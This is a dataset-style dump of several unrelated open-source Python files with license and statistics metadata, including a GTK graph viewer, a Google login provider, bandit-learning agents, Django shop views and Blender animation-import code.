kwargs['x'] self.train_y = kwargs['y'] self.train_pred, self.train_cost, self.train_acc = self.feedforward(is_training=True, **kwargs) self.optimizer = ops.train() def validation(self, **kwargs): self.val_x = kwargs['x'] self.val_y = kwargs['y'] self.val_pred, self.val_cost, self.val_acc = self.feedforward(**kwargs) self.val_pred = tf.Print(self.val_pred, [kwargs['frqid'], kwargs['frqid2']], message='frqids: ') def begin(self, session): #session.run(self.init) pass def should_stop(self): return False
mit
6,973,295,967,363,852,000
31.803571
149
0.605335
false
3.06934
false
false
false
inguma/bokken
ui/graph.py
1
6901
# graph.py # # Copyright 2011 Hugo Teso <hugo.teso@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. from gi.repository import Gtk from gi.repository import GObject from PIL import Image import os, tempfile from subprocess import * import ui.mydot_widget as mydot_widget import graph_bar class MyDotWidget(Gtk.HBox): '''Working''' def __init__(self, core, main): self.uicore = core self.main = main self.last_fcn = '' #dotcode = self.uicore.get_callgraph() #GObject.GObject.__init__(self, False, 1) # MEOW GObject.GObject.__init__(self) self.side_vb = Gtk.VBox(False, 1) self.side_hb = Gtk.HBox(False, 1) #self.dot_widget = DotWidget() self.dot_widget = mydot_widget.MyDotWidget(self.uicore, self.main) self.create_tree() self.create_preview() self.pack_start(self.dot_widget, True, True, 0) self.bar = graph_bar.GraphBar(self.dot_widget, self, self.uicore) #self.pack_start(self.bar, False, False, 0) self.side_hb.pack_start(self.bar, False, False, 1) if self.uicore.backend == 'radare': self.pack_start(self.side_vb, False, False, 1) self.side_hb.pack_start(self.sw, True, True, 1) self.side_vb.pack_start(self.side_hb, True, True, 1) self.side_vb.pack_start(self.preview, False, False, 0) def set_dot(self, dotcode): dotcode = dotcode.replace('overlap="scale", bgcolor="#475672"', 'overlap="scale", bgcolor="invis"') dotcode = dotcode.replace('color=azure3, fontcolor=white, fillcolor="#373D49"', 'color=blue, fontcolor="#666666", fillcolor=white') dotcode = dotcode.replace('fillcolor="#5E82C6"', 'fillcolor="white", color=green') dotcode = dotcode.replace('color=lightgray, style=filled,', 'color=blue') dotcode = dotcode.replace('color="lightgray"', 'color="blue"') dotcode = dotcode.replace('len=1.25, color=azure3', 'len=1.25, color=blue') dotcode = dotcode.replace('color=lightgray', 'color=lightgray, bgcolor=white') dotcode = dotcode.replace('color="green"', 'color="green", fontname="Courier", fontsize="8"') self.dot_widget.set_dotcode(dotcode) self.generate_thumbnail(dotcode) if self.uicore.backend == 'radare': self.nodes = {} function = '' for node in self.dot_widget.graph.nodes: function = '' if node.url: function, node_name = node.url.split('/') self.nodes[node_name] = [node.x, node.y] if function: self.update_tree(function) self.dot_widget.on_zoom_100(None) # Navigate to first node if self.uicore.backend == 'radare': if len(self.nodes) > 1: node = self.nodes.keys()[0] self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1])) def generate_thumbnail(self, dotcode): #size = self.tree.allocation.width size = self.side_hb.get_allocated_width() tmp_dot = tempfile.NamedTemporaryFile(delete = False) tmp_dot.write(dotcode) tmp_dot.close() cmd = "dot -Tpng " + tmp_dot.name + " > " + tmp_dot.name + ".png" os.system(cmd) im = Image.open(tmp_dot.name + ".png") im.convert('RGBA') im.thumbnail([size,size], Image.ANTIALIAS) #im.save(tmp_dot.name + ".png.thumbnail", "JPEG") # Add white backgound as image is transparent offset_tuple = (im.size[0], im.size[1]) final_thumb = Image.new(mode='RGBA',size=offset_tuple, color=(255,255,255,0)) final_thumb.paste(im) final_thumb.save(tmp_dot.name + ".png.thumbnail", "PNG") self.fill_preview(tmp_dot.name + ".png.thumbnail") os.remove(tmp_dot.name) os.remove(tmp_dot.name + ".png") os.remove(tmp_dot.name + ".png.thumbnail") def create_preview(self): # Create Image window for graph preview self.preview = Gtk.Image() self.preview.show() def fill_preview(self, path): self.preview.set_from_file(path) def create_tree(self): # Scrolled Window self.sw = Gtk.ScrolledWindow() self.sw.set_shadow_type(Gtk.ShadowType.ETCHED_IN) self.sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC) self.store = Gtk.ListStore(str, str) self.tree = Gtk.TreeView(self.store) self.sw.add(self.tree) self.tree.set_rules_hint(True) # Connect right click popup search menu self.popup_handler = self.tree.connect('button-press-event', self.popup_menu) # Create the column bblocks = Gtk.TreeViewColumn() bblocks.set_title("Basic Blocks") cell = Gtk.CellRendererText() bblocks.pack_start(cell, True) bblocks.add_attribute(cell, "text", 0) self.treestore = Gtk.TreeStore(str) # Add column to tree self.tree.append_column(bblocks) self.tree.set_model(self.treestore) self.tree.expand_all() def update_tree(self, function): # Clear contents self.treestore.clear() # Iterate bb and add to the tree it = self.treestore.append(None, [function]) nodes = self.nodes.keys() nodes.sort() for element in nodes: self.treestore.append(it, [element]) self.tree.set_model(self.treestore) self.tree.expand_all() def popup_menu(self, tree, event): if event.button == 1: coordinates = tree.get_path_at_pos(int(event.x), int(event.y)) # Get the information about the click. # coordinates is None if the click is outside the rows but inside # the widget. if not coordinates: return False (path, column, x, y) = coordinates if len(path) == 2 and self.nodes: node = self.treestore[path][0] self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
gpl-2.0
5,638,959,716,393,014,000
37.769663
139
0.605564
false
3.528119
false
false
false
maurodoglio/taarweb
taarweb/users/provider.py
1
1486
from allauth.socialaccount.app_settings import QUERY_EMAIL from allauth.socialaccount.providers.google.provider import (GoogleAccount, GoogleProvider, Scope) class TaarGoogleAccount(GoogleAccount): def get_profile_url(self): """ The profile URL field is called 'profile' for OpenIDConnect profiles, see https://developers.google.com/+/web/api/rest/openidconnect/getOpenIdConnect """ return self.account.extra_data.get('profile') class TaarGoogleProvider(GoogleProvider): def extract_uid(self, data): return str(data['sub']) def get_default_scope(self): "Override the default method to prepend 'openid' and add specific order" scope = ['openid'] if QUERY_EMAIL: scope.append(Scope.EMAIL) scope.append(Scope.PROFILE) return scope def get_hosted_domain(self): "If configured returns the Google Apps domain" return self.get_settings().get('HOSTED_DOMAIN', None) def get_auth_params(self, request, action): "If configured, adds the hosted domain to the auth request" params = super().get_auth_params(request, action) hosted_domain = self.get_hosted_domain() if hosted_domain is not None: params['hd'] = hosted_domain return params provider_classes = [TaarGoogleProvider]
mpl-2.0
-2,247,812,986,946,630,000
34.380952
87
0.617766
false
4.435821
false
false
false
dmanev/ArchExtractor
ArchExtractor/umlgen/Specific/STK/StkParser/StkJilFileCriteria/StkJilDataCriteria.py
1
2829
import re import PortInterface.ProvidedPort import PortInterface.RequiredPort import PortInterface.SenderReceiverInterface import Datatype.ArrayDataType import PortInterface.DataElement import StkParser.StkPortCriteria import Components.IComponent import Parser.IPortCriteria class StkJilDataCriteria(StkParser.StkPortCriteria.StkPortCriteria): """STK JIL file data access criteria""" def execute(self, inpTextContent, inoutIComponent): ## Bouml preserved body begin 0003536F if re.search(r'Data\s+(\w+)', inpTextContent): nextItemIsDataConfig = 0 dataName = None for item in re.split(r'(Data\s+\w+)', inpTextContent): nameMatchObj = re.search(r'Data\s+(\w+)', item) if nameMatchObj: nextItemIsDataConfig = 1 dataName = nameMatchObj.group(1) elif nextItemIsDataConfig: nextItemIsDataConfig = 0 dataProps = self.extractLevelOneBlock(item) if dataProps: dataType, hasArray = re.findall(r'\s*Type\s*=\s*([US]\d+)(Array|)', dataProps, re.I)[0] dtf = self.getDataTypeFactory() DT = dtf.getDataType(dataType) DE = PortInterface.DataElement.DataElement() DE.setName(dataName) if hasArray: arrayProps = self.extractLevelOneBlock(dataProps) arraySize = re.findall(r'\s*Size\s*=\s*(\d+)', arrayProps, re.I)[0] arrayDT = dtf.getArrayDataType('Arr'+arraySize+dataType) arrayDT.itsDataType = DT arrayDT.setMaxNumberOfElements(arraySize) DE.itsDataType = arrayDT else: DE.itsDataType = DT pif = self.getPortInterfaceFactory() sendRecvIf = pif.getSenderReceiverIf(dataName, [DE]) provPortSetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf) provPortSetter.setName("set"+dataName) provPortGetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf) provPortGetter.setName("get"+dataName) inoutIComponent.addPort(provPortSetter) inoutIComponent.addPort(provPortGetter) return inoutIComponent ## Bouml preserved body end 0003536F def __init__(self): super(StkJilDataCriteria, self).__init__() pass
gpl-3.0
6,982,030,154,229,971,000
47.775862
92
0.537292
false
4.570275
false
false
false
andreweskeclarke/reinforcement_learning
src/agents.py
1
5084
import math import random class Agent: def __init__(self, actions, options={}): self.rgen = random.SystemRandom() # cryptographically secure, unlike random self.actions = actions self.last_action = None def __choose_exploitative_action__(self): raise Exception('Not implemented!') def __choose_exploratory_action__(self): raise Exception('Not implemented!') def __should_exploit__(self): raise Exception('Not implemented!') def __update__(self, reward, state=None): raise Exception('Not implemented!') def choose(self): if self.__should_exploit__(): self.last_action = self.__choose_exploitative_action__() else: self.last_action = self.__choose_exploratory_action__() return self.last_action def update(self, reward, state=None): self.__update__(reward, state=None) class EGreedyAgent(Agent): def __init__(self, actions, options={}): super(EGreedyAgent, self).__init__(actions, options) use_optimistic = 'optimistic' in options and options['optimistic'] initial_reward = 5 if use_optimistic else 0 self.avg_rewards = [0 for a in self.actions] self.n_observations = [0 for a in self.actions] self.epsilon = options['epsilon'] def __choose_exploitative_action__(self): return self.avg_rewards.index(max(self.avg_rewards)) def __choose_exploratory_action__(self): return self.rgen.choice(self.actions) def __should_exploit__(self): return self.rgen.random() < (1 - self.epsilon) def __update__(self, reward, state=None): last_action = self.last_action avg = self.avg_rewards[last_action] self.n_observations[last_action] += 1 self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action] def softmax_choice(rgen, actions, action_prefs): choice = rgen.random() cumulative_probability = 1 softmax_denominator = sum([math.exp(p) for p in action_prefs]) for a in actions: softmax_a = math.exp(action_prefs[a]) / softmax_denominator cumulative_probability = cumulative_probability - softmax_a if cumulative_probability <= choice: return a assert(False) def discrete_choice(rgen, actions, action_prefs): choice = rgen.random() cumulative_probability = 1 for a in actions: cumulative_probability = cumulative_probability - action_prefs[a] if cumulative_probability <= choice: return a assert(False) class EGreedySoftmaxAgent(EGreedyAgent): def __choose_exploratory_action__(self): return softmax_choice(self.rgen, self.actions, self.avg_rewards) class ReinforcementComparisonAgent(Agent): def __init__(self, actions, options={}): super(ReinforcementComparisonAgent, self).__init__(actions, options) self.action_preferences = [0 for a in self.actions] self.alpha = options['alpha'] self.beta = options['beta'] self.reference_reward = 0 self.last_action = None def __choose_exploitative_action__(self): raise 'Unreachable code was reached!' def __choose_exploratory_action__(self): return softmax_choice(self.rgen, self.actions, self.action_preferences) def __should_exploit__(self): return False def __update__(self, reward, state=None): old_pref = self.action_preferences[self.last_action] self.action_preferences[self.last_action] = old_pref + self.beta * (reward - self.reference_reward) self.reference_reward = self.reference_reward + self.alpha * (reward - self.reference_reward) class PursuitAgent(Agent): def __init__(self, actions, options={}): super(PursuitAgent, self).__init__(actions, options) use_optimistic = 'optimistic' in options and options['optimistic'] initial_reward = 5 if use_optimistic else 0 self.avg_rewards = [0 for a in self.actions] self.n_observations = [0 for a in self.actions] self.action_probs = [1.0/len(self.actions) for a in self.actions] self.beta = options['beta'] def __choose_exploitative_action__(self): raise 'Unreachable code was reached!' def __choose_exploratory_action__(self): return discrete_choice(self.rgen, self.actions, self.action_probs) def __should_exploit__(self): return False def __update__(self, reward, state=None): last_action = self.last_action avg = self.avg_rewards[last_action] self.n_observations[last_action] += 1 self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action] max_index = self.avg_rewards.index(max(self.avg_rewards)) for i in range(0, len(self.action_probs)): prob = self.action_probs[i] if i != max_index: self.action_probs[i] = prob + (self.beta * (0 - prob)) else: self.action_probs[i] = prob + (self.beta * (1 - prob))
mit
-68,055,493,988,964,190
35.84058
107
0.635917
false
3.765926
false
false
false
escsun/radio-shop
catalog/views.py
1
1793
from django.shortcuts import render, get_object_or_404 from .models import Category, Product, Value from django.contrib import messages from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage from django.core.exceptions import ObjectDoesNotExist from cart.forms import CartAddProductForm def catalog_index(request, id=None): categories = Category.objects.filter(parent_id=id) try: category = Category.objects.get(id=id) except ObjectDoesNotExist: category = Category.objects.none() if not categories: products_list = Product.objects.filter(category_id=id, is_available=True) paginator = Paginator(products_list, per_page=25) page = request.GET.get('page') cart_product_form = CartAddProductForm() try: products = paginator.page(page) except PageNotAnInteger: products = paginator.page(1) except EmptyPage: products = paginator.page(paginator.num_pages) if not products: messages.error(request, "В данной категории товаров нет") return render(request, 'catalog_products.html', { "products": products, "category": category, "cart_product_form": cart_product_form }) response = render(request, 'catalog_base.html', { "categories": categories, "category": category }) return response def catalog_product_detail(request, id): product = Product.objects.get(id=id) category = Category.objects.get(id=product.category.id) values = Value.objects.filter(product_id=id) return render(request, 'catalog_product_detail.html', { "product": product, "values": values, "category": category })
gpl-3.0
3,052,322,435,605,630,000
34.36
81
0.664969
false
4.015909
false
false
false
niacdoial/blemd
pseudobones.py
1
21031
from mathutils import Vector, Euler, Matrix import bpy import math import re from .common import dict_get_set from . import common from .Matrix44 import rotation_part # import weakref import logging log = logging.getLogger('bpy.ops.import_mesh.bmd.pseudobones') NtoB = Matrix([[1,0,0,0], [0,0,-1,0], [0,1,0,0], [0,0,0,1]]) BtoN = Matrix([[1,0,0,0], [0,0,1,0], [0,-1,0,0], [0,0,0,1]]) def product(lamb, vct): ret = vct.copy() ret.x *= lamb ret.y *= lamb ret.z *= lamb return ret def sum2(vct1, vct2): ret = vct1.copy() ret.x += vct2.x ret.y += vct2.y ret.z += vct2.z return ret def subtract2(vct1, vct2): ret = vct1.copy() ret.x -= vct2.x ret.y -= vct2.y ret.z -= vct2.z return ret def vect_normalize(vect): length = math.sqrt(vect.x**2 + vect.y**2 + vect.z**2) if length < .01: log.error('Vector to be normalized is near zero. Returning (0,0,1) to avoid crashes') return Vector((0,0,1)) tempv = vect tempv.x /= length tempv.y /= length tempv.z /= length return tempv def cubic_interpolator(t1, y1, d1, t2, y2, d2, t): if -0.001 < t2-t1 < 0.001: log.warning('cannot interpolate between almost identiqual times') return (y1+y2) / 2, 0 tn = (t-t1)/(t2-t1) # normalized time coordinate d1 *= (t2-t1) # adapted derivatives for the normalized time interval d2 *= (t2-t1) # temporary values # for the value ya = (2*tn**3 - 3*tn**2 + 1)*y1 yb = (tn**3 - 2*tn**2 + tn)*d1 yc = (-2*tn**3 + 3*tn**2)*y2 yd = (tn**3 - tn**2)*d2 # and the tangent (will have to be corrected since d(a(b))=d(b)*d(a)(b)) da = (6*tn**2 - 6*tn) * y1 db = (3*tn**2 - 4*tn + 1) * d1 dc = (-6*tn**2 + 6*tn) * y2 dd = (3*tn**2 - 2*tn) * d2 y = ya+yb+yc+yd d = (da+db+dc+dd)/(t2-t1) return y, d, d ### # the goal here is to get the matrix adapted to blender animation # (from default pose to correct pose) # in blender, the matrix chain looks like # this (each contains translation and rotation): # origin_s*origin_d*bone_1_s*bone_1_d*....*bone_n_s*bone_n_d def get_dynamic_mtx(p_bone, frame): if frame not in p_bone.computed_d_matrices.keys(): local_mtx_y, local_mtx_ydL, local_mtx_ydR = p_bone.frames.get_mtx(frame) inv_static_mtx = p_bone.jnt_frame.getFrameMatrix().inverted() p_bone.computed_d_matrices[frame] = (inv_static_mtx * local_mtx_y, inv_static_mtx * local_mtx_ydL, inv_static_mtx * local_mtx_ydR) return p_bone.computed_d_matrices[frame] def get_pos_vct(p_bone, frame): EPSILON = 1E-4 y, ydL, ydR = get_dynamic_mtx(p_bone, frame) y = y.to_translation() ydL = ydL.to_translation() ydR = ydR.to_translation() # yd = get_dynamic_mtx(p_bone, frame+EPSILON).position() dL = (ydL-y)/EPSILON dR = (ydR-y)/EPSILON return y, dL, dR def get_rot_vct(p_bone, frame): EPSILON = 1E-4 y, ydL, ydR = get_dynamic_mtx(p_bone, frame) y = y.to_euler('XYZ') ydL = ydL.to_euler('XYZ') ydR = ydR.to_euler('XYZ') # yd = get_dynamic_mtx(p_bone, frame+EPSILON).rotation() dL = product(1/EPSILON, subtract2(ydL, y)) dR = product(1/EPSILON, subtract2(ydR, y)) return y, dL, dR def get_sc_vct(p_bone, frame): y, dL, dR = p_bone.frames.get_sc(frame) y.x /= p_bone.jnt_frame.sx y.y /= p_bone.jnt_frame.sy y.z /= p_bone.jnt_frame.sz dL.x /= p_bone.jnt_frame.sx dL.y /= p_bone.jnt_frame.sy dL.z /= p_bone.jnt_frame.sz dR.x /= p_bone.jnt_frame.sx dR.y /= p_bone.jnt_frame.sy dR.z /= p_bone.jnt_frame.sz return y, dL, dR instances = {} class KeyFrames: def __init__(self): self.times = {} self.positions = [{}, {}, {}] self.rotations = [{}, {}, {}] self.scales = [{}, {}, {}] def feed_anim(self, anim, include_sc=True, fr_sc=1, fr_of=0): for key in anim.translationsX: self.positions[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True for key in anim.translationsY: self.positions[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True for key in anim.translationsZ: self.positions[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True for key in anim.rotationsX: self.rotations[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True for key in anim.rotationsY: self.rotations[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True for key in anim.rotationsZ: self.rotations[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True if include_sc: for key in anim.scalesX: self.scales[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True for key in anim.scalesY: self.scales[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True for key in anim.scalesZ: self.scales[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR) dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True # add last frame on everything (to avoid crashes), but not register them as 'real' anim_length = max(self.times.keys()) for coordinate in (0,1,2): max_time = max(self.positions[coordinate].keys()) if max_time < anim_length: self.positions[coordinate][anim_length] = self.positions[coordinate][max_time] max_time = max(self.rotations[coordinate].keys()) if max_time < anim_length: self.rotations[coordinate][anim_length] = self.rotations[coordinate][max_time] max_time = max(self.scales[coordinate].keys()) if max_time < anim_length: self.scales[coordinate][anim_length] = self.scales[coordinate][max_time] def _get_vt(self, data, time): if time in data.keys(): return data[time] elif len(data.keys()) == 1: return next(iter(data.values())) prev_t = -math.inf next_t = +math.inf for frame_t in data.keys(): if prev_t < frame_t < time: prev_t = frame_t elif time < frame_t < next_t: next_t = frame_t return cubic_interpolator(prev_t, data[prev_t][0], data[prev_t][2], next_t, data[next_t][0], data[next_t][1], time) def get_pos(self, time): temp_x = self._get_vt(self.positions[0], time) temp_y = self._get_vt(self.positions[1], time) temp_z = self._get_vt(self.positions[2], time) return (Vector((temp_x[0], temp_y[0], temp_z[0])), Vector((temp_x[1], temp_y[1], temp_z[1])), Vector((temp_x[2], temp_y[2], temp_z[2]))) def get_rot(self, time): temp_x = self._get_vt(self.rotations[0], time) temp_y = self._get_vt(self.rotations[1], time) temp_z = self._get_vt(self.rotations[2], time) return (Euler((temp_x[0], temp_y[0], temp_z[0]), 'XYZ'), Euler((temp_x[1], temp_y[1], temp_z[1]), 'XYZ'), Euler((temp_x[2], temp_y[2], temp_z[2]), 'XYZ')) def get_sc(self, time): temp_x = self._get_vt(self.scales[0], time) temp_y = self._get_vt(self.scales[1], time) temp_z = self._get_vt(self.scales[2], time) return (Vector((temp_x[0], temp_y[0], temp_z[0])), Vector((temp_x[1], temp_y[1], temp_z[1])), Vector((temp_x[2], temp_y[2], temp_z[2]))) def get_mtx(self, time): EPSILON = 1E-4 vct_y, vct_dL, vct_dR = self.get_pos(time) rot_y, rot_dL, rot_dR = self.get_rot(time) vct_ydL = sum2(vct_y, product(EPSILON, vct_dL)) rot_ydL = sum2(rot_y, product(EPSILON, rot_dL)) vct_ydR = sum2(vct_y, product(EPSILON, vct_dR)) rot_ydR = sum2(rot_y, product(EPSILON, rot_dR)) return ( (Matrix.Translation(vct_y) * rot_y.to_matrix().to_4x4()), (Matrix.Translation(vct_ydL) * rot_ydL.to_matrix().to_4x4()), (Matrix.Translation(vct_ydR) * rot_ydR.to_matrix().to_4x4()) ) class Pseudobone: def __init__(self, parentBone, frame, matrix, startpoint, endpoint): self._name = None ori = endpoint - startpoint self.endpoint = endpoint self.length = math.sqrt(ori.x**2 + ori.y**2 + ori.z**2) self.orientation = vect_normalize(ori) self.scale = Vector((1, 1, 1)) self.jnt_frame = None # self.rotation_euler = Euler((0, 0, 0), 'XYZ') self.position = startpoint self.frames = KeyFrames() # self.inverted_static_mtx = None self.computed_d_matrices = {} self.computed_t_matrices = {} # self.scale_kf = {} # keyframes (values) # self.scale_tkf = {} # keyframes (tangents) # self.rotation_kf = {} # self.rotation_tkf = {} # self.position_kf = {} # self.position_tkf = {} # self.transform = mathutils.Matrix.Identity(4) # what to do with that? it will be ultimately useless. self._parent = None self.children = [] # property business -------------------------------- def _getname(): return self._name def _setname(val): global instances if self._name is not None: del instances[self._name] if val is None and val in instances.keys(): raise ValueError('name taken') self._name = val instances[val] = self def _delname(): self.name = None self.name = property(_getname, _setname, _delname) def _getparent(): return self._parent def _setparent(val): if isinstance(self.parent.fget(), Pseudobone) and (self in self.parent.fget().children): self.parent.fget().children.remove(self) self._parent = val if val is None or isinstance(val, Vector): return val.children.append(self) self.parent = property(_getparent, _setparent) def _setinchildren(holder, val): list.append(holder.children, val) val._parent = holder # self.children_append = (lambda self2, x: _setinchildren(self, x)) if isinstance(frame, str): self.name.fset(frame) else: self.jnt_frame = frame self.name.fset(frame.name) self.parent.fset(parentBone) self.matrix = matrix # defines self.name, self.parent, self.children_append. def pre_delete(self): # call before losing variable to avoid memory leak self.parent.fset(None) for com in self.children: com.pre_delete() def _tree_to_array(self, dest): """inner function. do not call.""" dest.append(self) for com in self.children: com._tree_to_array(dest) def tree_to_array(self): """returns a list of all bones""" ret = [] self._tree_to_array(ret) return ret def reset(self): self.frames = KeyFrames() self.computed_d_matrices = {} self.computed_t_matrices = {} def get_z(self): if common.GLOBALS.no_rot_conversion: return rotation_part(self.matrix) * Vector((0,0,1)) else: return NtoB*rotation_part(self.matrix)*BtoN * Vector((0,0,1)) def getBoneByName(name): global instances try: return instances[name] except KeyError: return None def getvct(one, distance, tgt): """get the right keyframe handle vector""" # XCX use me! # method one: return Vector((one, one*tgt)) finder = re.compile(r'''pose\.bones\[['"](\w*)['"]\]\.(\w*)''') #used to determine what curves belong to what bones def apply_animation(bones, arm_obj, jntframes, name=None): """apply keyframes from pseudobones to real, armature bones""" if name: arm_obj.animation_data.action = bpy.data.actions.new(name + '_action') else: arm_obj.animation_data.action = bpy.data.actions.new(arm_obj.name+'_action') bpy.context.scene.frame_current = 0 # warning: here, the `name` var changes meaning for com in bones: name = com.name.fget() arm_obj.data.bones[name].use_inherit_scale = False # scale can be applied posebone = arm_obj.pose.bones[name] if common.GLOBALS.no_rot_conversion: posebone.rotation_mode = "XYZ" else: posebone.rotation_mode = "XZY" # remember, coords are flipped bpy.context.scene.frame_current = 0 # this keyframe is needed, overwritten anyways # also it is always at 1 because this function is called once per action posebone.keyframe_insert('location') posebone.keyframe_insert('rotation_euler') posebone.keyframe_insert('scale') fcurves = arm_obj.animation_data.action.fcurves data = {} for curve in fcurves: # create data in dicts ({bonename:{datatype:[0,1,2]...}...}) try: bonename, datatype = finder.match(curve.data_path).groups() except TypeError: # cannit unpack None: this fsurve is not interesting continue bonedict = common.dict_get_set(data, bonename, {}) datadict = common.dict_get_set(bonedict, datatype, [None, None, None]) datadict[curve.array_index] = curve # create keyframes, with tengents for com in bones: name = com.name.fget() bonedict = data[name] posebone = arm_obj.pose.bones[name] bpy.context.scene.frame_current = 0 posebone.keyframe_insert('location') posebone.keyframe_insert('rotation_euler') posebone.keyframe_insert('scale') every_frame = list(com.frames.times.keys()) every_frame.sort() refpos = com.jnt_frame if type(com.parent.fget()) is not Pseudobone: com.rotmatrix = Matrix.Identity(4) com.parentrot = Matrix.Identity(4) else: com.rotmatrix = com.parent.fget().rotmatrix com.parentrot = com.parent.fget().rotmatrix tempmat = Euler((refpos.rx, refpos.ry, refpos.rz), 'XYZ').to_matrix().to_4x4() com.rotmatrix *= tempmat cancel_ref_rot = tempmat.inverted() for frame in every_frame: bpy.context.scene.frame_current = frame # flip y and z when asked for if com.frames.times[frame][0]: vct, tgL, tgR = get_pos_vct(com, frame) if not common.GLOBALS.no_rot_conversion: tgL.z, tgL.y = tgL.y, -tgL.z tgR.z, tgR.y = tgR.y, -tgR.z vct.z, vct.y = vct.y, -vct.z if not math.isnan(vct.x): posebone.location[0] = vct.x co = bonedict['location'][0].keyframe_points[-1].co bonedict['location'][0].keyframe_points[-1].handle_left = co+Vector((-1, -tgL.x)) bonedict['location'][0].keyframe_points[-1].handle_right = co+Vector((1, tgR.x)) posebone.keyframe_insert('location', 0) # fixed: add frame to keyframes AFTER setting the right value to it. so conter-intuitive. if not math.isnan(vct.y): posebone.location[1] = vct.y co = bonedict['location'][1].keyframe_points[-1].co bonedict['location'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y)) bonedict['location'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y)) posebone.keyframe_insert('location', 1) if not math.isnan(vct.z): posebone.location[2] = vct.z co = bonedict['location'][2].keyframe_points[-1].co bonedict['location'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z)) bonedict['location'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z)) posebone.keyframe_insert('location', 2) if com.frames.times[frame][1]: vct, tgL, tgR = get_rot_vct(com, frame) if not common.GLOBALS.no_rot_conversion: tgL.z, tgL.y = tgL.y, -tgL.z tgR.z, tgR.y = tgR.y, -tgR.z vct.z, vct.y = vct.y, -vct.z if not math.isnan(vct.x): posebone.rotation_euler[0] = vct.x co = bonedict['rotation_euler'][0].keyframe_points[-1].co bonedict['rotation_euler'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x)) bonedict['rotation_euler'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x)) posebone.keyframe_insert('rotation_euler', 0) if not math.isnan(vct.y): posebone.rotation_euler[1] = vct.y co = bonedict['rotation_euler'][1].keyframe_points[-1].co bonedict['rotation_euler'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y)) bonedict['rotation_euler'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y)) posebone.keyframe_insert('rotation_euler', 1) if not math.isnan(vct.z): posebone.rotation_euler[2] = vct.z co = bonedict['rotation_euler'][2].keyframe_points[-1].co bonedict['rotation_euler'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z)) bonedict['rotation_euler'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z)) posebone.keyframe_insert('rotation_euler', 2) if com.frames.times[frame][2]: vct, tgL, tgR = get_sc_vct(com, frame) if not common.GLOBALS.no_rot_conversion: tgL.z, tgL.y = tgL.y, tgL.z tgR.z, tgR.y = tgR.y, tgR.z vct.z, vct.y = vct.y, vct.z if not math.isnan(vct.x): posebone.scale[0] = vct.x co = bonedict['scale'][0].keyframe_points[-1].co bonedict['scale'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x)) bonedict['scale'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x)) posebone.keyframe_insert('scale', 0) if not math.isnan(vct.y): posebone.scale[1] = vct.y co = bonedict['scale'][1].keyframe_points[-1].co bonedict['scale'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y)) bonedict['scale'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y)) posebone.keyframe_insert('scale', 1) if not math.isnan(vct.z): posebone.scale[2] = vct.z co = bonedict['scale'][2].keyframe_points[-1].co bonedict['scale'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z)) bonedict['scale'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z)) posebone.keyframe_insert('scale', 2) return arm_obj.animation_data.action
gpl-3.0
5,015,250,740,609,675,000
39.481262
111
0.53735
false
3.21035
false
false
false
CFIS-Octarine/octarine
validate/gui/views/errorhandling.py
1
5325
